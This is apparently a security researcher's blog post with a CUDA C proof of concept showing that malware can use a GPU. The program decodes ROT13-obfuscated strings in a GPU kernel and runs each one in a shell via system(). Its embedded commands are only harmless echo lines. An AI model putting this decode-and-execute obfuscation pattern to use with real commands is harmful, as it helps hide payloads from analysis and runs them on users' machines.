After my Ruxcon talk on GPGPU malware, some people doubted that malware could use GPUs at all and that even if malware used GPUs, they would just be like normal malware (and since I did not provide any code sample at the conference, I can understand the frustration).
Here is a small code sample to convince the unconvinced: it contains encrypted strings, that are sent on the GPU to be decrypted. And once decrypted, they are executed in a shell.
#include <stdio.h>
#include <cuda.h>
#define MAX_SIZE 255
// caution: kickass encryption ahead
__global__ void decodeOnDevice(char *a) {
char cap;
int i = 0;
while(a[i] && i<MAX_SIZE) {
cap = a[i] & 32;
a[i] &= ~cap;
a[i] = ((a[i] >= 'A') && (a[i] <= 'Z') ? ((a[i] - 'A' + 13) % 26 + 'A') : a[i]) | cap;
i++;
}
}
int main(void) {
char *temp_host; // pointers to host memory
char *temp_device; // pointers to device memory
char commands[2][MAX_SIZE];
int i;
// allocate arrays on host
temp_host = (char *)malloc(MAX_SIZE);
// allocate arrays on device
cudaMalloc((void **) &temp_device, MAX_SIZE);
// initialize host data
memset(commands[0], 0, MAX_SIZE);
memset(commands[1], 0, MAX_SIZE);
// these are the encoded commands
memcpy(commands[0], "rpub Jung vf lbhe anzr, unaqfbzr xavtug?", strlen("rpub Jung vf lbhe anzr, unaqfbzr xavtug?"));
memcpy(commands[1], "rpub - Fve Tnynunq... gur Punfgr.", strlen("rpub - Fve Tnynunq... gur Punfgr."));
for(i = 0; i<2; i++) {
memset(temp_host, 0, MAX_SIZE);
memcpy(temp_host, commands[i], strlen(commands[i]));
// send data from host to device
cudaMemcpy(temp_device, temp_host, MAX_SIZE, cudaMemcpyHostToDevice);
// data copied on device, invoking kernel
decodeOnDevice <<< 1, 1 >>> (temp_device);
// retrieve data from device
cudaMemcpy(temp_host, temp_device, MAX_SIZE, cudaMemcpyDeviceToHost);
// execute the decoded command
system(temp_host);
}
}
Indefinite Studies 